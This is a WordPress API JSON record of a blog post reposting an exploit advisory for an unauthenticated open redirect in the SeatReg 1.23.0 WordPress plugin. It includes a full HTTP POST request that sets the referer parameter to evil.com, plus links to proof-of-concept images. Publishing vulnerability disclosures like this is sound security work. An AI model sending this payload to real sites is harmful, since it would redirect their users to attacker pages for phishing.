{"id":28849,"date":"2022-08-01T21:43:55","date_gmt":"2022-08-01T17:43:55","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167888\/wpseatreg1230-redirect.txt"},"modified":"2022-08-02T08:38:13","modified_gmt":"2022-08-02T04:08:13","slug":"wordpress-seatreg-1-23-0-open-redirect","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-seatreg-1-23-0-open-redirect\/","title":{"rendered":"WordPress SeatReg 1.23.0 Open Redirect"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: WordPress Plugin \u2018SeatReg\u2019 &#8211; Unauthenticated Open<br \/>\nRedirect<br \/>\n# Date: 01-08-2022<br \/>\n# Exploit Author: Mariam Tariq &#8211; HunterSherlock<br \/>\n# Vendor Homepage: https:\/\/wordpress.org\/plugins\/seatreg\/<br \/>\n# Version: 1.23.0<br \/>\n# Tested on: Firefox<br \/>\n# Contact me: mariamtariq404@gmail.com<\/p>\n<p dir=\"ltr\">*#Description:*<\/p>\n<p dir=\"ltr\">An Open Redirection is a vulnerability when a web application or server<br \/>\nuses an unvalidated user-submitted link to redirect the user to a given<br \/>\nwebsite or page.<\/p>\n<p dir=\"ltr\">*#Example of Burp Request *<br \/>\n&#8220;`<br \/>\nPOST \/wp-admin\/admin-post.php HTTP\/1.1<br \/>\nHost: website.com<br \/>\nUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0)<br \/>\nGecko\/20100101 Firefox\/103.0<br \/>\nAccept:<br \/>\ntext\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>\nAccept-Language: en-US,en;q=0.5<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nReferer: https:\/\/website.com<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nContent-Length: 185<br \/>\nOrigin: https:\/\/website.com<br \/>\nConnection: close<br \/>\nCookie: {cookies_here}<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nSec-Fetch-Dest: document<br \/>\nSec-Fetch-Mode: Navigate<br \/>\nSec-Fetch-Site: same-origin<\/p>\n<p dir=\"ltr\">new-registration-name=dedeed&amp;action=seatreg_create_submit&amp;seatreg-admin-nonce=11b1308e8a&amp;*_wp_http_referer=https:\/\/evil.com<br \/>\n&lt;https:\/\/evil.com&gt;*&amp;submit=Create+new+registration<br \/>\n&#8220;`<br \/>\n*#PoC Image:*<\/p>\n<p dir=\"ltr\">https:\/\/ibb.co\/tCZWH0H<br \/>\nhttps:\/\/ibb.co\/5kh299z<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WordPress Plugin \u2018SeatReg\u2019 &#8211; Unauthenticated Open Redirect # Date: 01-08-2022 # Exploit Author: Mariam Tariq &#8211; HunterSherlock # Vendor Homepage: https:\/\/wordpress.org\/plugins\/seatreg\/ # Version: 1.23.0 # Tested on: Firefox # Contact me: mariamtariq404@gmail.com *#Description:* An Open Redirection is a vulnerability when a web application or server uses an unvalidated user-submitted link to redirect &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28849","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28849","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28849"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28849\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}